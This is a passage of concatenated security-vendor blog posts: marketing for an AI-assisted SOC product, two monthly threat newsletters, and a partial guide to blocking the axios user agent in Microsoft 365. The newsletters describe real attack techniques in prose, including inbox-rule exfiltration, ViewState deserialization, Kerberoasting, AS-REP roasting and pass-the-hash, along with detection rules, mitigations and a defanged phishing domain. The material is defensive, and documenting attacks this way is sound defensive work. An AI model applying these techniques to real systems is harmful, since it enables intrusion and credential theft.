SecurityHQ’s differentiation is rooted in understanding of what SOCs actually need: not more tools or more detections, but more clarity. While many vendors focus AI capabilities on detection, increasing the volume and sophistication of threat identification, this approach assumes the primary challenge is visibility.

This is where AI driven security investigation becomes critical, shifting focus from alert volume to contextual understanding and decision support. 

SecurityHQ’s approach addresses the actual limiting factor in SOC performance, the ability to transform fragmented signals into clear, actionable intelligence. SecurityHQ operationalises this approach through SHQ Autopilot. Rather than sending analysts isolated alerts to correlate manually, the platform assembles related activity across environments into centralized, contextualised insight.

IDC’s assessment captured this distinction, highlighting that SecurityHQ’s emphasis on investigation clarity produces the outcomes security leaders care about: faster incident resolution, more defensible decisions, sustainable operations, not just broader visibility or more sophisticated detection for its own sake.

Why Investigation Breaks in Modern SOCs 

Security Operations Centers have expanded significantly in size, tooling, and coverage. Yet threats continue to bypass defences. Industry research consistently points to a gap between detection and action, where teams struggle to investigate alerts quickly enough to contain real threats. 

As environments grow across endpoints, networks, cloud platforms, identities, and applications, analysts are required to manually connect fragmented signals under constant time pressure. This slows investigations, introduces inconsistency, and creates opportunities for attackers to evade response. 

In many SOCs, analysts still review alerts one by one, determine relevance, and piece together activity across multiple tools. While this can work at smaller scales, it becomes difficult to sustain in high-volume environments generating thousands of alerts each day. 

AI has been widely adopted to improve detection, but increased alert volume alone does not solve investigation challenges. In many cases, it exacerbates them.   

Leveraging AI for Decision Clarity

What security teams need is not more alerts, but clearer context. Analysts need to understand which signals are related, how activity has unfolded over time, and whether a situation actually warrants response.

By connecting signals across time and environments, AI driven security investigation helps analysts understand how activity unfolds and whether it genuinely warrants response.

When telemetry from different security controls is analysed in isolation, that clarity is hard to achieve. When it is brought together and examined as a whole, investigation can shift from alert handling to behaviour-based understanding. 

Machine learning helps establish baselines and surface anomalies across time-series data. Large language models can then assemble related activity into readable investigative summaries, making it easier for analysts to understand what is happening and why it matters. 

“Modern SOCs don’t fail because they lack tools, they fail because they lack clarity. AI changes the investigation model by reducing noise, connecting activity across the environment, and allowing analysts to focus on threats that genuinely matter. When applied correctly, it becomes a force multiplier for both speed and decision quality,” said Aaron Hambleton, SVP MEA. 

SHQ Autopilot

SHQ Autopilot brings AI driven security investigation into daily SOC operations by correlating activity and assembling incidents as clear investigative narratives.

SHQ Autopilot uses AI and automation to qualify alerts, correlate related activity across users, hosts, IP addresses, and cloud resources, and assemble incidents as clear investigative narratives. Instead of presenting analysts with disconnected alerts, it provides a structured view of what happened, how activity progressed, and which assets or identities are involved. 

By embedding investigation logic directly into workflows, SHQ Autopilot reduces manual correlation and repetitive analysis. This supports earlier identification of multi-stage attacks and more consistent incident qualification, particularly in high-volume environments. 

Investigation outputs then flow directly into response. Context, enrichment, and mitigation guidance are attached to incidents, enabling automated containment actions where confidence thresholds are met. Where human judgement is required, analysts are supported with clearer information and recommended next steps. 

This allows analysts to focus on validation, decision making, and oversight, rather than reconstructing events across multiple tools.

What IDC Recognised

In its assessment, IDC highlighted SecurityHQ’s ability to consolidate telemetry across SIEM, EDR, NDR, and cloud sources through the SHQ Response platform, supported by a data fabric aligned to Open Cybersecurity Schema Framework standards. 

IDC also noted the role of SHQ Autopilot in generating contextualised incident storylines, applying workflow automation, and supporting investigation and triage, alongside ContainX for enabling automated containment actions. 

Together, these capabilities reflect an approach that prioritises investigation clarity, consistency, and expert-led response at scale. 

While AI and automation reduce friction and speed up workflows, experienced analysts remain essential for interpreting complex scenarios, applying business context, and overseeing response decisions. 

This balance allows SecurityHQ to scale operations without sacrificing transparency or control.

Conclusion

SecurityHQ’s recognition as an IDC MarketScape Leader reflects the strength of its MDR offering across multiple dimensions, including how investigation and response are handled in practice. As security environments continue to grow in scale and complexity, the ability to move from fragmented alerts to clear, defensible decisions becomes increasingly important. 

IDC’s assessment reinforces the value of approaches that prioritise investigation clarity, contextual understanding, and expert-led response. SecurityHQ’s continued recognition underscores its focus on producing measurable outcomes for its clients by enabling them with greater speed, clarity, and confidence in the face of evolving threats.

The post How AI Brings Clarity to SOCs: Inside IDC’s Recognition of SecurityHQ’s Approach to MDR  appeared first on SecurityHQ.

Threat Actors Leveraging Phishing to Compromise User Mailbox and Abuse Inbox Rules

Detection: SecurityHQ’s SOC detected suspicious email activity associated with a user account, including abnormal inbox rule creation and unusual outbound email patterns, through Microsoft Defender for Office 365 alerts and message tracking log analysis.

Description: SOC identified a phishing incident where a user’s credentials were compromised after interacting with a malicious phishing email. Following successful account compromise, the threat actor authenticated to the user’s mailbox and created a malicious inbox rule that automatically forwarded incoming emails to an external RSS feed email address and marked those emails as read, effectively hiding attacker activity and exfiltrating sensitive communications.

Further investigation revealed that the compromised user account was subsequently used to send internal phishing emails to multiple employees within the organization, leveraging the trust associated with a legitimate internal sender. As a result, several additional user accounts were exposed and partially compromised before containment actions were initiated. Lead Incident Responder reviewed audit logs, inbox rule configurations, sign-in activity, and email telemetry to confirm the scope of compromise and identify affected users.

Immediate response actions included disabling the compromised account, resetting credentials, removing malicious inbox rules, revoking active sessions, and blocking the external forwarding destination. All affected users were notified, and suspicious internal phishing emails were removed from mailboxes using Defender remediation actions.

Lessons Learnt: User phishing remains a highly effective initial access vector for attackers. Inbox rule abuse is a common technique used to maintain persistence and evade detection. Rapid detection, user education, and automated remediation capabilities are critical to minimizing the blast radius of phishing-based compromises.

Threat Actors Exploiting weakness in ASP.NET viewstate deserialization to Remote Code Execution

Detection: Client reported possible malicious activity due to the presence of web shells on an IIS-hosted web server.

Description: The client reported the possible presence of a web shell on a web server. The team initiated an investigation using the available IIS server access logs and requested access to the client’s Microsoft Defender console. Based on log analysis, the team confirmed that the initial attack vector was an ASP.NET ViewState deserialization vulnerability. The team identified all malicious web shell payloads and the source IP addresses from which they were deployed. Immediate mitigation steps were recommended, including removing write permissions from the utilities folder. The team also provided all identified Indicators of Compromise (IOCs) to be blocked via the Defender console.

Recommendations: To strengthen the overall security posture, the team recommended applying the patch for the ViewState vulnerability. The team provided all available Indicators of Compromise (hashes) to be blocked in Microsoft Defender and also shared detection criteria for identifying similar instances, recommending the creation of a custom detection rule in Defender.

Lessons Learnt: Organizations should patch zero day critical vulnerabilitites immediately. IIS web servers hosting public applications are attractive targets for attackers. Continuous monitoring and hardening of these assets are essential. Enforcing least-privilege access (e.g., restricting write access to application folders) can significantly reduce attacker capabilities.

Threat Detection Engineering

Key Detection Engineering Highlights for December

A Global Penetration Testing Season Observed by SecurityHQ (Nov–Dec 2025)

As the year drew to a close, SecurityHQ’s global SOC entered one of its busiest periods. From November through December 2025, organizations across North America, EMEA, APAC, and LATAM scheduled year-end penetration testing and red team exercises to validate their security posture before the new fiscal year.

Early Reconnaissance: Mapping the Identity Landscape

In multiple customer environments, pentesters began quietly. Using LDAP queries, they enumerated Active Directory structures, probing for pre-authentication enabled accounts—a classic foothold for later abuse. SecurityHQ analysts noticed a surge in read-heavy directory queries, far exceeding normal user behavior baselines.

Soon after, the focus shifted to high-value groups. Enumerations of Domain Admins and Enterprise Admins were performed repeatedly, sometimes using native Windows tools, other times via popular AD enumeration frameworks. In mature environments, these queries triggered decoy account interactions, immediately flagging malicious intent.

Parallel to these activities, Pen testers conducted discovery scans, sweeping some known ports running windows services that can pave the way for lateral movement. In several cases, testers attempted DNS zone transfer requests, hoping to extract internal naming conventions and asset inventories.

Credential Access: Testing Human Weakness

The activity continued with password spray attacks. Pentesters tested commonly used passwords across large user populations, carefully staying below lockout thresholds.

SecurityHQ’s behavioral analytics detected the low-and-slow authentication failures and correlated them with earlier enumeration activity, forming a complete attack narrative.

Privilege Escalation Attempts: Ticket-Based Attacks

As reconnaissance matured, pentesters escalated to Kerberos abuse techniques.
SecurityHQ telemetry showed:

• Kerberoasting attempts, where service accounts with SPNs were targeted for offline password cracking.
• AS-REP Roasting, leveraging accounts with disabled pre-authentication to request encrypted authentication material.

These activities stood out due to abnormal Kerberos ticket request patterns.

Logical Phase	Pentester Activity	SecurityHQ Use Case Coverage
Network Discovery	Discovery scans for open services/ports	Covered
Network Discovery	Zone transfer request	Covered
Directory Recon	AD/DC enumeration using LDAP queries	Covered
Directory Recon	Excessive domain object queries	Covered
Directory Recon	Default Admin Group Enumeration	Covered
Target Identification	Identify pre-auth enabled accounts	Covered
Target Identification	Decoy account enumeration	Covered
Credential Access	AS-REP Roasting	Covered
Credential Access	Kerberoasting	Covered
Authentication Abuse	Password spray	Covered

LDAP AS-REP Roasting

Any of the AD account can be used suddenly to produce a burst of login events on the active directory. Mostly it is the the tool or a script that rapidly queries directory information, attempting to identify privileged roles, access paths, and high-value accounts. Credentials of the account are generally hard coded or embedded within the tool or script being used.

SecurityHQ’s Threat Detection team have developed logic that uses LDAP Active Directory Services event log file available under C:\Windows\System32\winevt\Logs

Rule Name: Authentication: Windows – Possible LDAP AS-REP Roasting

Detection Scope: Monitors LDAP and Kerberos authentication activity across Active Directory domain controllers.

Why it matters: Exposed Kerberos responses can be cracked offline, potentially leading to credential compromise without triggering repeated login failures. Early detection of this behavior helps identify credential access attempts before attackers escalate privileges or move laterally.

MITRE ATT&CK Mapping

TA0006 – Credential Access

T1558.004 – Steal or Forge Kerberos Tickets: AS-REP Roasting.

Threat Management

SecurityHQ’s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. Following section highlights some key security insights. 

Alert: Multiple Suspicious Script and Reconnaissance Activities Detected (INC #1460383)

Detection: An incident was detected using Microsoft Defender for Endpoint (MDE) alerts and telmetries on December 8th, 2025, indicating multiple suspicious activities. The alert covered abnormal script execution, potential persistence mechanisms, defense evasion techniques, and domain reconnaissance activity originating from a single internal endpoint. The activity was classified as suspicious due to the combination of tools and techniques commonly associated with malicious actor behavior.

Investigation: On December 8th, 2025, Microsoft Defender for Endpoint detected a sequence of suspicious actions initiated from a remote interactive session originating from an internal source IP. The activity involved the use of built-in Windows utilities and scripting engines that are commonly abused by threat actors. Notably, the NLTest utility was executed with the /domain_trusts parameter to enumerate domain trust relationships, a behavior indicative of Active Directory reconnaissance and often observed during ransomware operations or lateral movement preparation.

Shortly thereafter, additional suspicious behavior was identified, including the abuse of Rundll32 to execute JavaScript, a known living-off-the-land technique used to evade security controls, and wscript execution modifying registry keys related to proxy configuration, which could enable interception or redirection of web traffic. PowerShell was also observed as part of the activity chain, with the associated file hash reviewed through threat intelligence sources. The combination of script-based execution, system enumeration, and potential proxy manipulation strongly suggests intentional reconnaissance and defense evasion, rather than legitimate administrative activity.

Response Action taken:

• SOC Raised Major Incident and informed customer over call.
• Threat Management Team blocked identified IOCs and updated the incident.
• The malicious process was successfully blocked and terminated by Microsoft Defender.
• No further suspicious activity has been observed. Full antivirus scan has been performed across the entire host to ensure no residual malware components remain active

Alert: MDE: Pass the Hash followed by brute force was detected on Windows server. (INC #1471047)

Detection: An incident was detected using Microsoft Defender for Endpoint (MDE) alerts and telmetries on December 16th, 2025,, indicating suspicious lateral movement activity and remote command execution on device. The alert identified ‘SuspRemoteCmdCommand’ malware associated with WMI process execution originating from an external IP address.

Investigation: On December 16th, 2025, security monitoring identified a successful network logon (Event ID 4624) using an anonymous authentication context over NTLM, originating from an internal source IP and targeting domain controller infrastructure. The authentication leveraged NTLM V1 with a key length of zero via the NtLmSsp logon process, which is highly anomalous and consistent with Pass-the-Hash–style activity. During the same timeframe, multiple indicators of credential abuse were observed, including failed NTLM authentication attempts for privileged accounts, enumeration of a large number of user accounts consistent with a dictionary-style attack, and repeated access attempts to administrative and IPC shares. Additional LDAP query activity against directory services further suggested reconnaissance behavior focused on domain discovery.

Subsequent investigation revealed a broader pattern of post-authentication activity, including the creation of new processes associated with agent-style executables, the addition of multiple network share objects, and repeated access to SYSVOL, NETLOGON, and IPC$ shares from the same source. Follow-on actions included the creation and password reset of new computer accounts within the domain, successful network logons tied to the same source IP, and directory read access across multiple domain controller shares, all indicative of lateral movement and persistence preparation. In parallel, sensitive recovery material was accessed via directory and cloud interfaces, increasing the overall risk severity. Taken together, the activity strongly aligns with credential misuse, lateral movement, and domain-level reconnaissance, rather than legitimate administrative operations.

Response Action taken:

• SOC Raised Major Incident and informed customer over call.
• Threat Management Team blocked identified IOCs and updated the incident.
• Running Malicious processes were terminated, Residues cleared by the Threat Management analyst.
• No further suspicious activity has been observed. Full antivirus scan has been performed across the entire host to ensure no residual malware components remain active.

Threat Hunting

SecurityHQ’ s Threat Hunting team conducted hunts focused in general email activities seen in the customer’s environment. Following section highlights some of the key findings and recommendations that were communicated to affected customers.

Context: Suspicious and abnormal email communication patterns were observed across the organizations, indicating a potential risk of data exfiltration, unauthorized information disclosure, or insider misuse. These behaviors include frequent communication with competitor domains, outbound emails sent outside business hours, attachments sent to free or personal email services, and anomalous email activity linked to departing employee accounts.

The objective of these hypotheses was to proactively detect, investigate, and respond to email-based data leakage risks, ensuring sensitive business information is not transferred outside the enterprise without authorization and strengthening the overall email security posture.

Notable Observations: Across the environment, the threat hunt identified multiple high-risk email behaviors. Key findings are summarized below: 

Extensive Communication with Competitor Domains

A significant volume of email communication was observed between internal users and competitor domains. List of competitor domains were shared proactively by few organisations with matured security program.

Key Observations:

• On an average 1-2 percent of total emails were identified involving competitor domains.
• Top competitor domains included key competitors for the company.
• Repeated high-frequency communications from a small subset of users. Subject lines referenced agreements, contracts, approvals, financial statements, tax and legal matters, increasing data sensitivity concerns.

Associated Risk: These patterns may indicate unauthorized sharing of confidential business information, competitive intelligence leakage, or misuse of corporate email channels. This highlights importance of adding competitor domains on watchlist to detect unapproved/intentional data leakage.

Out-of-Business Hours External Email Activity

Outbound emails sent between 7 PM and 7 AM showed elevated volumes toward external recipients.

Key Observations:

• Multiple users sent hundreds of emails to external recipients during non-business hours.
• Several emails were linked to payment-related or financial subjects.
• Activity occurred during low-visibility periods, reducing detection likelihood.

Associated Risks: Email activity during off-hours increases the risk of covert data exfiltration, especially when financial or sensitive business information is involved.

Email Activity from Departing / Disabled Accounts

Email activity was analyzed for users whose accounts were disabled in the last 30 days.

Key Observations:

• No clear evidence of malicious behavior immediately prior to account disablement were observed by SecurityHQ Team.
• From past experiences, Typically leavers tend to forward document as an email attachment to their personal email accounts.
• Associated Risk: Although not conclusively malicious, data leakage risk increases during employee offboarding, especially when legal or financial documents are involved.

Emails Sent to Free & Personal External Email Domains

Significant email traffic was observed toward free external email providers in organization where these domains are not explicitly blocked.

Key Observations:

• On average, 10 percent of total email trails involving free external domains.
• 70 percent of total emails sent, appeared to be sent to potential personal email accounts.
• All flagged emails included attachments.

Associated Risk: Sending attachments to personal email accounts is a well-known insider threat and data exfiltration technique, presenting one of the highest leakage risks identified in this hunt.

External Email Auto-Forwarding Indicators

While external auto-forwarding appears largely restricted, related behaviors were still noted.

Key Observations:

• No widespread misconfiguration allowing automatic forwarding was identified.
• Users were observed manually forwarding emails to external accounts.
• Lack of user awareness regarding the risks of external forwarding.

Associated Risk: Manual forwarding can bypass technical controls and enables silent, persistent data exfiltration if not properly monitored.

Hypothesis Status:

• The threat hunt identified multiple email communication behaviors that increase the risk of data exfiltration, although no confirmed malicious breach was detected.
• High-volume communication with competitor domains, combined with sensitive subject lines, represents a moderate to high data leakage risk.
• Out-of-business-hours emailing and attachment sharing to free or personal domains significantly elevates insider threat exposure.
• Departing employee accounts did not show over malicious intent but still warrant validation due to the nature of shared content.
• Overall, the findings highlight control gaps, monitoring blind spots, and awareness issues that could be exploited for unauthorized data disclosure if left unaddressed.

Recommendations: Based on the observed email threat landscape, the following actions are recommended

• Enforce DLP policies to detect and block sensitive financial, legal, and confidential content in outbound emails.
• Block or quarantine attachments sent to free and personal external email domains.
• Enable automatic encryption and mandatory classification for sensitive outbound email attachments.
• Monitor and alert on outbound emails sent to external recipients outside business hours.
• Trigger alerts when users send an unusually high number of attachments to new external recipients.
• Continuously monitor and review communications with competitor domains.
• Perform enhanced email activity reviews for users during employee offboarding periods.
• Restrict external email capabilities for departing users where business-justified.
• Educate users on risks associated with forwarding corporate emails to personal accounts.
• Periodically audit external email forwarding behaviors and policy exceptions.

Incident Response Success Story

Incident Story: X (Formerly Known as Twitter) Account Compromised Linked to corporate domain

SecurityHQ’s Incident Response (IR) team was engaged following a suspected account takeover involving Apple IDs, social media accounts, and mobile devices. The attack leveraged leaked personal data, phishing, and session hijacking techniques to bypass MFA and gain persistent access.

The incident began when an attacker obtained leaked personal data from an external breach. Using this information, the attacker crafted a highly targeted phishing email impersonating Apple security communications.

The phishing email prompted the victim to consent to Apple account access, unknowingly authorizing a malicious OAuth session. This allowed the attacker to bypass MFA via session hijacking.

With valid session access, the attacker logged in using the leaked credentials and began account persistence actions:

• Recovery email was changed on the X (Twitter) account
• Mobile number was updated on Telegram
• Deleted old tweets.

Investigation revealed that a single Session ID was accessed from multiple geographically disparate locations simultaneously. This anomaly provides definitive evidence of Session Hijacking, indicating that the attacker stole the valid session token and replayed it from a remote infrastructure to bypass Multi-Factor Authentication(MFA). 

The user’s personal Apple ID appeared in multiple breach datasets, and both personal and corporate accounts were active on the same device. This strongly supports a session hijacking pathway originating from the compromised personal account, enabling access to the corporate session without requiring the corporate password.

No direct evidence of corporate credential leakage was found on the dark web, and no further lateral movement was identified.

SecurityHQ Incident Response team shared tactical and strategical recommendation to prevent recurrence of similar incidents in future.

Authors:

The post Managed Defense Threat Insights: December 2025 Newsletter appeared first on SecurityHQ.

Threat Actor successfully probes PHP RCE payload towards website protected by AWS WAF & ALB

Detection: Incident driven security assessment led to detecting PHP RCE Probing Attempts on a Non-PHP Nginx Web Server disclosing and mitigating a critical security risk allowing bypass of defense layers.  

Description: While reviewing client’s security posture, SecurityHQ’s Incident Response team identified malicious traffic attempting to exploit a PHP Remote Code Execution (RCE) vulnerability against a web application hosted on Nginx, which does not run any PHP components. The attacker’s objective appeared to be reconnaissance — specifically, probing for server behavior and response codes. Because the affected webserver was not yet integrated with SIEM, initial 404 responses generated by Nginx were not visible to the Monitoring Team. A deeper investigation, combined with consultation with the application team, revealed that these 404 responses were originating from the web tier behind the AWS WAF and Application Load Balancer (ALB). 

Recommendations: To strengthen the overall security posture and reduce unnecessary traffic reaching the application backend, we recommended enabling all default AWS Managed Rule Groups within AWS WAF. These rule sets help block common exploit attempts—including PHP-based probes—at the edge, preventing them from being forwarded to the ALB and ultimately to the webserver. This proactive hardening step aligns with AWS best practices and significantly minimizes exposure to widespread vulnerability scanners and exploit attempts. 

Critical Vulnerability in Fortinet FortiWeb Exploited in the Wild

Detection: Critical FortiWeb Zero-Day Alert: Path Traversal Exploit Enables Remote Authentication Bypass

SHQ Detection Pack – Relevant Use Cases

1. Suspicious Web Requests Identified in Audit, System Logs
2. Administrative Logins to the management interface
3. Configuration Changes Executed

Description: SecurityHQ’s Incident Response team successfully responded to the incident involving CVE-2025-64446 – a critical vulnerability impacting Fortinet’s FortiWeb Web Application Firewall. The issue combines a relative path traversal flaw with an authentication bypass, allowing remote, unauthenticated attackers to access internal management endpoints. As per Vendor, Multiple FortiWeb versions are affected, including 7.0.0–7.0.11, 7.2.0–7.2.11, 7.4.0–7.4.9, 7.6.0–7.6.4, and 8.0.0–8.0.1, as confirmed by FortiGuard Labs and CISA. Exploitation requires no valid credentials. Attackers can send crafted HTTP(S) requests that leverage the pathtraversal weakness to reach protected CGI components on the management interface. Successful exploitation enables complete authentication bypass, allowing threat actors to create new administrative accounts and gain full control of the FortiWeb device. This poses a significant risk to environments relying on FortiWeb as a frontline security control.

Mitigation Actioned:

• Restricted Management Access to trusted internal
• networks only.
• Keys, Credentials and certificates were rotated.

Lessons Learnt: Organizations should have a strong proactive patching regime, restrict management access to internal networks, and enable key WAF protections to block exploitation attempts. Post-patch, review admin accounts and logs for unauthorized activity and ensure full SIEM visibility for ongoing monitoring.

Threat Detection Engineering

Key Detection Engineering Highlights for November

Azure Hound Probes

Threat Actors widely use Azure Hound or similar tools to map users, groups, and roles within Microsoft 365 or Entra ID as part of early enumerations. Often used by Red teamers to identify gaps in cloud security. Here is a short example of this Attack method: A lowprivilege account suddenly produces a burst of signins from an unusual application pattern.

The tool rapidly queries directory information, attempting to identify privileged roles, access paths, and high-value accounts.

Why it matters: This type of reconnaissance helps attackers understand your cloud environment, find weak points, and plan privilege escalation. Detecting these early signals reduces the chance of further compromise.

Rule Name: Azure Hound User Agent Detected (P2) Detection Scope: Microsoft 365 and Entra ID Rationale: Reconnaissance tools generate directory queries and sign-in patterns that differ from normal user activity. Identifying these anomalies allows early detection before attackers escalate privileges or move deeper into the environment.

BloodHound – Behavioral Detection:

An attacker runs a BloodHound/SharpHound collector from a compromised workstation to rapidly enumerate Active Directory. BloodHound enumeration creates rapid, large-scale directory queries that differ from normal user or admin behavior. Tracking abnormal spikes in object-access events helps identify reconnaissance before privilege escalation or lateral movement occurs.

Here is a short example of this Attack method: Host XYZ generated 2,400 “Failure Audit: An operation was performed on an object” events in 45 seconds, each referencing different AD objects (users/groups/ACLs). The source account was a low-privilege user (not a well-known service account) and the requests targeted many high-value OUs.

Why it matters: BloodHound-style enumeration reveals relationships, privileges, and ACEs that attackers use to plan lateral movement and privilege escalation.

Rule Name: Excessive Directory Access Failures Detected (P3)

Detection Scope: Monitor Windows Security audit logs for spikes in object-access events (success & failure) indicating mass AD enumeration; surface SourceHost, Username, and TargetObject; exclude known service/ admin accounts.

Threat Management

SecurityHQ’s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. Following section highlights some key security insights. 

Account Takeover! Sign-In Activity from malicious useragent “axios/1.13.1”

Detection: The incident trigger was a suspicious user authentication activity with unfamiliar sign-in properties and a detected password spray attack. The alert identified potential unauthorized access attempts originating from an unusual IP address and nonstandard client application.

Investigation: Identity Protection detected an unusual interactive sign-in for the user account originating from external IP address from USA location. The authentication was performed using the atypical user agent “axios/1.13.1”, a tool commonly used for automated HTTP requests rather than legitimate
browser-based logins.

Multiple aspects of the authentication including ASN, browser type, device fingerprint, geographic location, and Tenant IP subnet were all inconsistent with the user’s typical login patterns from users location and device, making the activity highly anomalous. Although MFA was successfully completed via text message to the registered number, the abnormal client and unfamiliar sign-in characteristics raised concerns regarding potential credential compromise or account
takeover.

Subsequent activity from the account included a suspicious URL click event leading to a OneDrive resource. Sandbox analysis confirmed the link redirected to a OneDrive login page, indicative of phishing intent. The URL originated from “cable[.]coromans[.]com”, a domain active since 2010 but potentially abused for malicious purposes. Additionally, a concurrent password spray detection targeting multiple accounts suggested broader credential-stuffing attempts in the environment. Based on these findings, the activity aligns with MITRE ATT&CK T1110 (Brute Force) under TA0001 – Initial Access, consistent with threat actors attempting unauthorized entry via automated or scripted authentication attempts. 

Actions taken: A major incident was raised, and the customer was notified over the phone. Immediate remediation steps were applied to the user’s account, and the identified IOC were blocked by SecurityHQ Team under Manager EDR Service 

Reference: https://www.securityhq.com/blog/adaptive-defense-how-cloud-app-policies-can-block-malicious-user-agents/

Throughout the year 2025, SecurityHQ Team Raised 300+ Major incidents originating from this axios UserAgent and were successful in preventing further damage in all cases.

Suspicious Remote Command Execution and Lateral Movement Activity.

Detection: An incident was escalated indicating suspicious lateral movement activity and remote command execution on device. The alert identified ‘SuspRemoteCmdCommand’ malware associated with WMI process execution originating from an external IP address. 

Investigation: Microsoft Defender for Endpoint (MDE) detected suspicious WMI-related activity involving the legitimate WmiPrvSE.exe process executed with the unusual command line “-secured -Embedding.” Although WmiPrvSE.exe is commonly used by Windows, the behavior was flagged due to the associated detection of SuspRemoteCmdCommand, suggesting potential remote command execution.

Shortly afterward, a secondary process executed via cmd.exe, running quietly to capture the output of the whoami command to a temporary file—an action typically associated with attacker reconnaissance following lateral movement. The event also correlated with a prior Lateral Movement Detected alert on the same host, reinforcing concerns of unauthorized remote execution.

During behavior monitoring, threat was identified and terminated promptly. This active threat was classified as Behavior:Win32/SuspRemoteCmdCommand.SA operating within the WmiPrvSE.exe process.

Additional telemetry captured WUDFHost.exe activity near the same timeframe, indicating possible chained system operations triggered during the malicious sequence. Threat intelligence enrichment further validated risk indicators, as the external IP, and associated file hash were flagged by multiple security sources, supporting Defender’s classification of the activity as malicious.

Remediation Actions: The malicious process was successfully blocked and terminated by Microsoft Defender. No further suspicious activity was observed. All identified IOC’s wer blocked. Full antivirus scan was performed across the entire host to ensure no residual malware components remain active.

Not many security solutions are able to log command line activities. Having Enterprise EDR solution or command line auditing tool like Sysmon enables defenders and analyst to detect activities happening under the hood.

Threat Hunting

SecurityHQ’ s Threat Hunting team focused on hunting threats in cloud where Malicious or unauthorized activities occurring within the cloud environment mainly due to compromised credentials, misconfigured permissions, or exploitation of vulnerable services, leading to potential privilege escalation, lateral movement, and data exfiltration.

The objective of these hypotheses is to proactively detect, investigate, and respond to suspicious or unauthorized activities across cloud infrastructure that may indicate compromise, privilege escalation, data exfiltration, or other malicious behaviors — thereby reducing risk exposure and improving cloud security posture 

Notable Observations: Large-Scale Role Assumption & Privilege Probing: One of the customer environments showed an extremely high volume of AssumeRole operations, hinting at automation or scripted enumeration.

Key Observations:

• Unknown external IPs performing API calls with repeated access denials.
• Attempts to access sensitive resources or enumerate services.
• Occasional rate-throttling events tied to highvolume API activity, suggesting automation.

Associated Risk: Likely indicators of scripted scanning, misconfigured integrations, or malicious reconnaissance.

EC2 & Compute Irregularities: Most environments showed no compute-based compromise activity, but a
minority revealed abnormalities.

Key Observations:

• Large EC2 instances running unexpectedly.
• Rate-limiting and throttling events associated with compute services.

Associated Risks: No confirmed persistence, but compute resources are being probed or misused in some tenants.

Recommendations: Based on the combined threat landscape observed across all customers, the following global recommendations apply:

• Enforce Strong Authentication Immediately.
• Remove legacy IAM accounts where possible.
• Restrict console access by IP through IAM conditions or network controls.
• Harden IAM Roles & Reduce Privilege Exposure.
• Limit access to Secrets Manager and KMS to essential roles only.
• Lock Down S3 Storage by enabling Block Public Access globally.
• Conduct a Global Access Key Audit.

Incident Response – Success Story

Incident Story: ASP.NET Machine Key Exploitation

One of the Customer of SecurityHQ recently faced a critical web server compromise originating from a longstanding vulnerability in Microsoft’s ASP.NET framework. Threat actors have begun weaponizing publicly exposed ASP.NET machine keys — some of which have been available online since as early as 2003 — to hijack Internet Information Services (IIS) servers and deploy malicious modules.

IR Observations: Attack Narrative
During the investigation, it was discovered that threat actors exploited ASP.NET ViewState deserialization flaws. By obtaining publicly available machine keys, they could tamper with serialized ViewState data — a component used to maintain state information across web requests. Because these machine keys are cryptographic secrets that validate and secure ViewState content, possessing them effectively allowed the attackers to bypass ViewState MAC validation and execute arbitrary code on the targeted servers — all without requiring authentication credentials.

Microsoft had previously identified over 3,000 exposed machine keys across open repositories, forums, and developer sites, creating a wide landscape of potential victims. Many of these keys belonged to applications built on .NET Framework versions prior to 4.5, which lack built-in protection against deserialization abuse. 

Impact Analysis

Once the IIS servers were compromised, attackers loaded malicious IIS modules to maintain persistence and intercept incoming HTTP requests. These modules enabled:

• Command execution under IIS worker process privileges.
• Credential harvesting from memory and web traffic.
• Data exfiltration through legitimate web communications.
• Possible lateral movement within the network via trusted server accounts.

The stealth of this method made detection difficult, as all activities appeared as legitimate IIS traffic and
processes.

Root Cause

• Use of outdated ASP.NET versions (< 4.5) lacking secure ViewState handling.
• Disabled or weak MAC validation for ViewState integrity.
• Reuse or exposure of machine keys in public repositories and code-sharing platforms.

Conclusion

The exploitation of legacy ASP.NET vulnerabilities through leaked machine keys highlights the persistent risk posed by long-standing insecure configurations and public code exposure. By promptly rotating keys, enabling validation, and upgrading to modern frameworks with AMSI support, Organisation can restore the integrity of its web applications and prevent future exploitation of this vector.  

Reference: https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/

The post Managed Defense Threat Insights: November 2025 Newsletter appeared first on SecurityHQ.

Many organizations seek to block malicious user agents and prevent scripted or unauthorized programmatic access to Microsoft 365. Adversary-in-the-Middle (AiTM) attacks are on the rise, allowing attackers to intercept and forward authentication traffic in real time, even circumventing multi-factor authentication (MFA). A significant development is the adoption of malicious user agents, such as Axios, a JavaScript-based HTTP client, which attackers use to replicate browser activity and take over user sessions.

With these tools, attackers can:

• Automate the collection of credentials and replay of sessions
• Bypass basic browser fingerprinting techniques
• Launch large-scale attacks with minimal manual effort

Although detection strategies like monitoring user-agent strings or identifying unusual geolocation patterns are available, there is a lack of comprehensive guidance on countering these specific threats. Conventional security measures often fail to detect axios-driven requests that closely resemble genuine user actions.

As a result, organizations are exposed to risks including:

• Session hijacking, even when MFA is enabled
• Challenges in distinguishing automated agents from real users
• Ongoing unauthorized access after initial authentication

This blog underscores the urgent need to block malicious user agents through adaptive session policies and advanced behavior-based security in Microsoft 365

Prerequisites

Step-by-Step Configuration

Enable Microsoft Defender for Cloud Apps

Microsoft Defender for Cloud Apps (MDCA) is a security tool that provides visibility and control over user sessions in SaaS applications. It acts as a reverse proxy when Conditional Access routes a user’s traffic through it

1. Go to Microsoft 365 Defender Portal
2. Navigate to:
   Settings → Microsoft Defender for Cloud Apps → Connected Apps → Conditional Access App Control apps
3. Ensure Microsoft 365 apps are listed as below. If not, follow below 3.2 steps, to proceed to create conditional access policy for routing the requests to Cloud Apps

Create Conditional Access for Route Traffic to MDCA

Conditional Access App Control sends the session through the MDCA proxy where session inspection happens. This is the foundation for blocking based on the User-Agent string.

Go to Azure Portal → Microsoft Entra ID → Conditional Access

Click + New Policy

Configure the following settings:

Save and apply the policy.

Trigger MDCA Session Routing (App Detection)

After the CA policy is active, the user must log into the app (e.g., Outlook) to trigger MDCA to detect and begin monitoring the app.

1. Open a private/incognito browser window.
2. Visit Outlook or Teams.
3. Log in with a test account.
4. Wait 1–2 minutes.
5. Go to: Cloud Apps → Settings → Connected Apps → Conditional Access App Control apps
6. Confirm apps like Office 365, Teams, or Exchange appear as Monitored

Note: If not detected, recheck your Conditional Access policy and retry in incognito mode.

Create MDCA Session Policy to Block Axios

